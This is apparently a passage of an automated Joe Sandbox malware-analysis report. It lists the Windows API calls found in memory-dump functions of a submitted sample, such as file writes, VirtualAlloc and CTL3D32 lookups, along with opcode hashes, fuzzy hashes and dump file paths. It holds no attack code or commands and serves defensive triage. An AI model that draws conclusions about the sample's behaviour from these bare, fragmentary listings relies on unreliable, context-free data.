                                                                                                                                                                                                                                  • Opcode ID: 6665614e34a0f7cff573ca1669b2a109aa27f3c0ddffd1931b228eca5c2d9aab
                                                                                                                                                                                                                                  • Instruction ID: 5c2dbd3a099336849a47a332199978da45cb785deb8a29a76394180ab3bc5383
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6665614e34a0f7cff573ca1669b2a109aa27f3c0ddffd1931b228eca5c2d9aab
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A1E09BB09097004BC715DF39858031A76D19FC9325F05C96AEC99CF3D7E77D84454617
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(004959E6,?,00495A08,?,?,00000000,004959E6,?,?), ref: 0041469B
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2492992576-0
                                                                                                                                                                                                                                  • Opcode ID: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                                                                                                                                                                                  • Instruction ID: 3a83c41fa5c3d176b15f2666d2672a78f9af76d4247255e2ff0bda4df6ea0631
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 59E012723001199F8250CE5EDC88C57FBEDEBC966130983A6F508C7306DA31EC44C7A0
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406F24
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileWrite
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3934441357-0
                                                                                                                                                                                                                                  • Opcode ID: 4c02731fe18b0a47ab7745946c5e8dd4c7dfafdb2aa22804bebcbb41d9412fbb
                                                                                                                                                                                                                                  • Instruction ID: adeaf4ebd0e6cd94d64be6b3cb299443ba394f13a0b1cd3d8337db6b6af80796
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c02731fe18b0a47ab7745946c5e8dd4c7dfafdb2aa22804bebcbb41d9412fbb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 53D012722091506AD220965A6C44EAB6BDCCBC5770F11063AB558C2181D7209C01C675
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 004235F8: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 0042360D
                                                                                                                                                                                                                                  • ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                                                                                                                                                                                                    • Part of subcall function 00423628: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 00423644
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
• API ID: InfoParametersSystem$ShowWindow
• String ID:
• API String ID: 3202724764-0
• Opcode ID: 749b279e1c5e0ab7b3e77853442b745bf30ea7cb0c28c018a636783dda1148f2
• Instruction ID: 3e39ddd90fb628193caaea160b6f4ed5bf244f394cc2da11a07db6b12dca8b82
• Opcode Fuzzy Hash: 749b279e1c5e0ab7b3e77853442b745bf30ea7cb0c28c018a636783dda1148f2
• Instruction Fuzzy Hash: 34D05E123821703142307ABB280699B46EC8D822EB389043BB5449B312ED5DCE01116C
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetWindowTextA.USER32(?,00000000), ref: 004242DC
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: TextWindow
• String ID:
• API String ID: 530164218-0
• Opcode ID: 968e2600307bd84f4d65718215a4df57ccfa9b7919b98356d7a542cd4e907fd2
• Instruction ID: e359d8c046b4275bb87a72ac3440150ee0889cd0e7de0465f76ccf46c1161c2e
• Opcode Fuzzy Hash: 968e2600307bd84f4d65718215a4df57ccfa9b7919b98356d7a542cd4e907fd2
• Instruction Fuzzy Hash: 81D05EE27011602BCB01BAED54C4AC667CC9B8D25AB1840BBF904EF257D638CE40C398
Uniqueness

Uniqueness Score: -1.00%

APIs
• KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467828,00000000,00000000,00000000,0000000C,00000000), ref: 00466B58
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0
• Opcode ID: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
• Instruction ID: a3a9c25b9c80179eca176ae0059a0aa24e3542550d9dc9bac8dced773014ab2a
• Opcode Fuzzy Hash: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
• Instruction Fuzzy Hash: 0ED09272210A109F8364CAADC9C4C97B3ECEF4C2213004659E54AC3B15D664FC018BA0
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetFileAttributesA.KERNEL32(00000000,00000000,004515CB,00000000), ref: 0042CD2F
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 9f26b129d564bfe00fcaedc41dfc35f11866fd4db5ee91d95e6c1a36d58de6ea
• Instruction ID: 53db4a1afaa3b7bebcc80daf879f764776582c58df104e6651e2d127eece83ed
• Opcode Fuzzy Hash: 9f26b129d564bfe00fcaedc41dfc35f11866fd4db5ee91d95e6c1a36d58de6ea
• Instruction Fuzzy Hash: 48C08CE03222001A9E60A6BD2CC551F06CC891423A3A41E3BB129EB2E2D23D88162818
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A6D4,0040CC80,?,00000000,?), ref: 00406EDD
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: d487f09bce5ab2446fefe52ff91139140134d323c8d44495a9ab4cbc0f9c4527
• Instruction ID: fbce42704b7dd2fd8be74a622cf743b4adaa06f64be9adac3ea2875d17ee2119
• Opcode Fuzzy Hash: d487f09bce5ab2446fefe52ff91139140134d323c8d44495a9ab4cbc0f9c4527
• Instruction Fuzzy Hash: EAC048A13C130032F92035A60C87F16008C5754F0AE60C43AB740BF1C2D8E9A818022C
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
  • Part of subcall function 004506B4: GetLastError.KERNEL32(004504D0,00450776,?,00000000,?,00497E2C,00000001,00000000,00000002,00000000,00497F8D,?,?,00000005,00000000,00497FC1), ref: 004506B7
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: ErrorFileLast
• String ID:
• API String ID: 734332943-0
• Opcode ID: dfd6122944db5b319254e7b77af95d7469dcf5406d44b15aeae4525e96e42585
• Instruction ID: 9573b676cf6dd5fef234c73c81a1a5d02d78d5ca05287b50762f3c98dcfac2da
• Opcode Fuzzy Hash: dfd6122944db5b319254e7b77af95d7469dcf5406d44b15aeae4525e96e42585
• Instruction Fuzzy Hash: 1AC04CA5700211479F10A6BA85C1A0662D86A5D3157144066BD08CF207D668D8148A18
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetCurrentDirectoryA.KERNEL32(00000000,?,00497DBA,00000000,00497F8D,?,?,00000005,00000000,00497FC1,?,?,00000000), ref: 004072B3
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CurrentDirectory
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1611563598-0
                                                                                                                                                                                                                                  • Opcode ID: 9cfe1b671e2ded52e2a4f1899edd371c25323ab6eac1b77aed394817f5a1d109
                                                                                                                                                                                                                                  • Instruction ID: 2ee9fcf0c2ecb8048618371478a38130c752a95b947e2a8aefd026f579ab26ad
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9cfe1b671e2ded52e2a4f1899edd371c25323ab6eac1b77aed394817f5a1d109
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 33B012E03D120A2BCA0079FE4CC192A00CC46292163401B3B3006EB1C3D83DC8180824
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(?,0042E40D), ref: 0042E400
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorMode
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2340568224-0
                                                                                                                                                                                                                                  • Opcode ID: cb8e2ebd86b0ac1182f6c4657d989dfa6a466ad308997f4b3834ff3b1e7758f7
                                                                                                                                                                                                                                  • Instruction ID: 426ac138898b17598b25982f2c454791bd479401c65f9a69ae9baa170422678e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cb8e2ebd86b0ac1182f6c4657d989dfa6a466ad308997f4b3834ff3b1e7758f7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CDB09B7670C6105EE709D6D5B45552D63D4D7C57207E14477F010D2581D57D58054E18
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DestroyWindow
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3375834691-0
                                                                                                                                                                                                                                  • Opcode ID: 1244af60e57b01067fe56da529b9c4312cbd500fa9ed17bad69dff1823a021af
                                                                                                                                                                                                                                  • Instruction ID: 4f6e5339ba6c71e81ef5aec1f6829bfe42d3c8de95bc03762545e97b2cddf6f9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1244af60e57b01067fe56da529b9c4312cbd500fa9ed17bad69dff1823a021af
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1AA00275501500AADA00E7B5D849F7E2298BB44204FD905F9714897056C57C99008B55
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 2f87504b9b3c5ef8a424e08888e9b878f09f15df180bfdf00abd21092ab1bc52
                                                                                                                                                                                                                                  • Instruction ID: 41a6872630840156d23f43a697f0b10540748f54e9aa1b8241e7bbe25a2b1888
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2f87504b9b3c5ef8a424e08888e9b878f09f15df180bfdf00abd21092ab1bc52
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 73517574E002099FDB00EFA9C892AAFBBF5EB49314F50817AE500E7351DB389D41CB98
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDA4,?,0042388F,00423C0C,0041EDA4), ref: 0041F3E2
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                  • Opcode ID: f624f178b2757757f6ee0ed82108e7e17b49aa81eb1cfd09d0e3ddd3732ee692
                                                                                                                                                                                                                                  • Instruction ID: 3312bc658de40493dbbbdb628fa1ac862c14c743cb2aabe02eeb7d71ec829e14
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f624f178b2757757f6ee0ed82108e7e17b49aa81eb1cfd09d0e3ddd3732ee692
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D5115A752007059BCB20DF19D880B82FBE5EF98390F10C53BE9688B385D3B4E8458BA9
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,0045302D), ref: 0045300F
                                                                                                                                                                                                                                  Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: ErrorLast
• String ID:
• API String ID: 1452528299-0
• Opcode ID: 796ee09302341f2f0fe022b6b7ad64e2259239b3e6510a293da86372227c0e6a
• Instruction ID: b902f5f71593d0acd8113edc39c0d5725662cc955bae9521e0e34912f41e4d76
• Opcode Fuzzy Hash: 796ee09302341f2f0fe022b6b7ad64e2259239b3e6510a293da86372227c0e6a
• Instruction Fuzzy Hash: 850170356042486FC701DF699C008EEFBE8EB4D76171082B7FC24C3382D7345E059664
Uniqueness

Uniqueness Score: -1.00%

APIs
• VirtualFree.KERNEL32(?,?,00004000,?,?,?,00003078,0000707B,00401973), ref: 00401766
Similarity
• API ID: FreeVirtual
• String ID:
• API String ID: 1263568516-0
• Opcode ID: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
• Instruction ID: fd45504e6079eb3c344fd15592bdf3984e08e9418c18d248e8b2091ea2ac4f2a
• Opcode Fuzzy Hash: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
• Instruction Fuzzy Hash: A10120766443148FC3109F29EDC0E2677E8D794378F15453EDA85673A1D37A6C0187D8
Uniqueness

Uniqueness Score: -1.00%

APIs
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: 11f5b55454e2001d57305e4d26194660ee260494afc1ae4151642f59c6b90a28
• Instruction ID: 073c3129693101c5e7833b7ffa09eca8aa7a1e81ff9bb2ce6bcaaab03392c7d4
• Opcode Fuzzy Hash: 11f5b55454e2001d57305e4d26194660ee260494afc1ae4151642f59c6b90a28
• Instruction Fuzzy Hash:
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetVersion.KERNEL32(?,00418FF0,00000000,?,?,?,00000001), ref: 0041F126
• SetErrorMode.KERNEL32(00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F142
• LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F14E
• SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F15C
• GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F18C
• GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1B5
• GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1CA
• GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1DF
• GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1F4
• GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F209
• GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F21E
• GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F233
• GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F248
• GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F25D
• FreeLibrary.KERNEL32(00000001,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F26F
Strings
Similarity
• API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
• String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
• API String ID: 2323315520-3614243559
• Opcode ID: 62814c6def9f01bce39a36d2c4270fbdb1234b3c2cb706e68bb71ccad2797809
• Instruction ID: e724c2aa341d6685c6ab1c4031cb88844a897dd828fe35f3324890dc483947ec
• Opcode Fuzzy Hash: 62814c6def9f01bce39a36d2c4270fbdb1234b3c2cb706e68bb71ccad2797809
• Instruction Fuzzy Hash: 8E314FB2640700ABEB01EBB9AC46A6B3794F328724741093FB508D7192D77C5C55CF5C
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetTickCount.KERNEL32 ref: 0045862F
• QueryPerformanceCounter.KERNEL32(020A3858,00000000,004588C2,?,?,020A3858,00000000,?,00458FBE,?,020A3858,00000000), ref: 00458638
• GetSystemTimeAsFileTime.KERNEL32(020A3858,020A3858), ref: 00458642
